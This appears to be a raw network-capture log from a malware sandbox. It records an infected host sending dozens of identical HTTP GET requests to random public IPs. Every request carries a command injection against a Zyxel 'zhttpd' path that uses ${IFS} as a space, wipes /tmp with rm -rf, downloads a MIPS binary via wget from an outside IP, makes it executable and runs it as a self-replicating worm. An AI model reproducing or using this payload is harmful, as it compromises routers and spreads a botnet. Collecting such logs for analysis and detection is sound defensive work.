                              Mar 31, 2024 08:41:13.632968903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2147192.168.2.1358834176.174.91.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633013010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2148192.168.2.1360888217.141.114.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633042097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2149192.168.2.1359812223.174.217.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633106947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2150192.168.2.1356196119.46.86.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633141041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2151192.168.2.1349448152.64.12.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633193016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2152192.168.2.134867666.152.223.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633244038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2153192.168.2.135750619.85.89.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633284092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2154192.168.2.135406836.10.137.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633316040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2155192.168.2.135842063.195.116.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633338928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2156192.168.2.1335036210.146.115.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633379936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2157192.168.2.135818896.60.150.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633426905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2158192.168.2.1360002189.218.78.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633456945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2159192.168.2.135968451.87.111.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633511066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2160192.168.2.1348164154.68.31.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633567095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2161192.168.2.1360378162.37.76.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633589983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2162192.168.2.134784284.15.71.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633635044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2163192.168.2.1359704184.240.19.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633667946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2164192.168.2.133946812.122.106.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633701086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2165192.168.2.13540421.161.229.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633723974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2166192.168.2.1342810197.58.180.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633795977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2167192.168.2.133735851.163.226.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633831978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2168192.168.2.136011074.246.250.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633876085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2169192.168.2.1336190121.224.206.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633918047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2170192.168.2.1349444182.141.96.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633955002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2171192.168.2.13379665.136.185.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.633984089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2172192.168.2.133386889.83.4.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634018898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2173192.168.2.1357182187.15.192.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634068012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2174192.168.2.135830814.93.17.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634116888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2175192.168.2.135565687.154.169.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634156942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2176192.168.2.1338258137.213.97.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634185076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2177192.168.2.133625640.115.243.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634207010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2178192.168.2.135530697.76.127.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634255886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2179192.168.2.133654020.78.65.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634300947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2180192.168.2.1335560192.170.242.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634330988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2181192.168.2.1348444113.164.28.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634351969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2182192.168.2.1337240151.221.184.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634382963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2183192.168.2.1342780178.107.120.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634429932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2184192.168.2.1342544202.177.242.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634485960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2185192.168.2.133631049.215.252.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634541988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2186192.168.2.1337150172.56.3.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634572983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2187192.168.2.134225469.172.60.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634656906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2188192.168.2.1352304145.123.190.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634689093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2189192.168.2.1347978153.86.86.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634742022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2190192.168.2.1339208163.116.127.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634787083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2191192.168.2.1334130174.138.112.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634844065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2192192.168.2.1349348175.79.141.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634865999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2193192.168.2.1345618194.246.34.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634907961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2194192.168.2.1337456189.201.116.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634932995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2195192.168.2.135884293.105.140.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.634962082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2196192.168.2.1334466209.59.203.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635008097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2197192.168.2.1352486108.84.131.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635046959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2198192.168.2.133786471.164.121.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635102987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2199192.168.2.135275669.176.34.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635149002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2200192.168.2.1350116124.29.166.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635195017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2201192.168.2.135664259.92.216.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635216951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2202192.168.2.1338068128.102.149.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635262966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2203192.168.2.134323898.124.113.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635325909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2204192.168.2.134702018.176.21.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635365009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2205192.168.2.1344062209.228.136.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635416985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2206192.168.2.1358150142.158.83.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635432959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2207192.168.2.133669459.95.179.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635471106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2208192.168.2.13555921.216.43.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635504961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2209192.168.2.133376259.221.193.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635531902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2210192.168.2.1360336135.128.46.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635557890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2211192.168.2.1347634218.152.210.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635607958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2212192.168.2.135611436.29.229.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635648966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2213192.168.2.136092681.227.26.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635684013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2214192.168.2.1347728208.171.42.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.635740042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2215192.168.2.133882247.213.206.173443
                              TimestampBytes transferredDirectionData
